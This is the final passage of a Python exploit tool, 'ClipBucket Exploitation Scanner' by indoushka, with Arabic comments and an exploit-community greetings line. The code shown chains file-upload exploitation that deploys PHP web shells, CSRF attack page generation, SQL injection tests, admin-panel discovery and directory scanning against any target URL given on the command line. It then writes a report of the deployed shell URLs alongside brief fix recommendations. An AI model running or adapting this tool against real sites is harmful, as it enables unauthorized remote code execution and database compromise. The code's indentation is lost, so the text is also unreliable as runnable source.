self.print_status("="*60, "info")
report = []
report.append(f"Target: {self.target}")
report.append(f"Scan Time: {time.strftime('%Y-%m-%d %H:%M:%S')}")
report.append("")
# الثغرات المكتشفة
if self.vulnerabilities or self.shell_urls:
report.append("VULNERABILITIES FOUND:")
report.append("-" * 40)
for vuln in self.vulnerabilities:
report.append(f"✓ {vuln}")
if self.shell_urls:
report.append(f"✓ Remote Code Execution: {len(self.shell_urls)} shells deployed")
for i, shell in enumerate(self.shell_urls, 1):
report.append(f" Shell {i}: {shell}")
report.append("")
# التوصيات
report.append("RECOMMENDATIONS:")
report.append("-" * 40)
if 'CSRF' in self.vulnerabilities:
report.append("• Implement CSRF tokens on all forms")
if 'SQL Injection' in ' '.join(self.vulnerabilities):
report.append("• Use prepared statements for database queries")
if self.shell_urls:
report.append("• Implement strict file upload validation")
report.append("• Disable PHP execution in upload directories")
else:
report.append("No critical vulnerabilities found")
report.append("")
report.append("FILES GENERATED:")
report.append("-" * 40)
# عرض الملفات المولدة
files_to_check = ['shells_found.txt', 'csrf_attack.html',
'admin_panel_found.txt', 'sqli_evidence.txt']
for file in files_to_check:
if os.path.exists(file):
report.append(f"• {file}")
# كتابة التقرير
report_text = "\n".join(report)
print("\n" + report_text)
with open('exploitation_report.txt', 'w', encoding='utf-8') as f:
f.write(report_text)
self.print_status("\nReport saved to: exploitation_report.txt", "success")
def run_complete_scan(self):
"""تشغيل مسح شامل"""
self.print_status("Starting complete ClipBucket vulnerability scan...", "info")
# الخطوة 1: التحقق من ClipBucket
if not self.check_clipbucket():
self.print_status("Target doesn't appear to be ClipBucket. Stopping scan.", "error")
return
# الخطوة 2: اختبار upload.php
if not self.test_upload_endpoint():
self.print_status("upload.php not functioning properly", "warning")
# الخطوة 3: استغلال رفع الملفات
self.exploit_file_upload()
# الخطوة 4: اختبار CSRF
self.exploit_csrf()
# الخطوة 5: اختبار SQL Injection
self.test_sqli()
# الخطوة 6: البحث عن لوحة التحكم
self.find_admin_panel()
# الخطوة 7: مسح الدلائل
self.scan_directories()
# الخطوة 8: التقرير النهائي
self.generate_report()
def main():
"""الدالة الرئيسية"""
print("\033[95m" + """
╔══════════════════════════════════════════════════════╗
║ ClipBucket Exploitation Scanner ║
║ By indoushka ║
╚══════════════════════════════════════════════════════╝
""" + "\033[0m")
if len(sys.argv) < 2:
print("Usage:")
print(f" python {sys.argv[0]} <target_url>")
print("\nExamples:")
print(f" python {sys.argv[0]} https://example.com")
print(f" python {sys.argv[0]} http://192.168.1.100")
print(f" python {sys.argv[0]} http://localhost/clipbucket")
return
target = sys.argv[1]
# إضافة http:// إذا لم يكن موجوداً
if not target.startswith(('http://', 'https://')):
target = 'http://' + target
# إنشاء واستخدام الكلاس
exploiter = ClipBucketExploiter(target)
try:
exploiter.run_complete_scan()
except KeyboardInterrupt:
print("\n\nScan interrupted by user")
except Exception as e:
print(f"\nError during scan: {str(e)}")
if __name__ == "__main__":
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================